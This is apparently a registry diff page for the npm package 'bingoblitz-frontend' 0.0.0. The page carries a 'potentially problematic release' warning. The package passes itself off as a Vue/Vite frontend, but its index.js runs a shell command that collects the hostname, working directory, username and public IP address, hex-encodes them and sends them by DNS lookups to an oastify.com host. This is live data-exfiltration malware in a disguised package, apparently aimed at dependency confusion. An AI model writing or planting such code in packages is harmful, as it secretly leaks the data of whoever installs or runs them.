bingoblitz-frontend 0.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of bingoblitz-frontend might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +13 -0
  2. package/package.json +31 -0
package/index.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require("child_process");
2
+ exec("a=$(hostname;pwd;whoami;echo 'bingoblitz-frontend';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $a.2rueh2i2h18p9gp7l2kgf2xj7ad71w.oastify.com;done" , (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
package/package.json ADDED
@@ -0,0 +1,31 @@
1
+ {
2
+ "name": "bingoblitz-frontend",
3
+ "version": "0.0.0",
4
+ "private": false,
5
+ "scripts": {
6
+ "dev": "vite",
7
+ "build": "run-p type-check \"build-only {@}\" --",
8
+ "preview": "vite preview",
9
+ "test:unit": "vitest",
10
+ "build-only": "vite build",
11
+ "type-check": "vue-tsc --noEmit -p tsconfig.vitest.json --composite false"
12
+ },
13
+ "dependencies": {
14
+ "vue": "^3.3.4",
15
+ "vue-router": "^4.2.4"
16
+ },
17
+ "devDependencies": {
18
+ "@tsconfig/node18": "^18.2.2",
19
+ "@types/jsdom": "^21.1.3",
20
+ "@types/node": "^18.17.17",
21
+ "@vitejs/plugin-vue": "^4.3.4",
22
+ "@vue/test-utils": "^2.4.1",
23
+ "@vue/tsconfig": "^0.4.0",
24
+ "jsdom": "^22.1.0",
25
+ "npm-run-all2": "^6.0.6",
26
+ "typescript": "~5.2.0",
27
+ "vite": "^4.4.9",
28
+ "vitest": "^0.34.4",
29
+ "vue-tsc": "^1.8.11"
30
+ }
31
+ }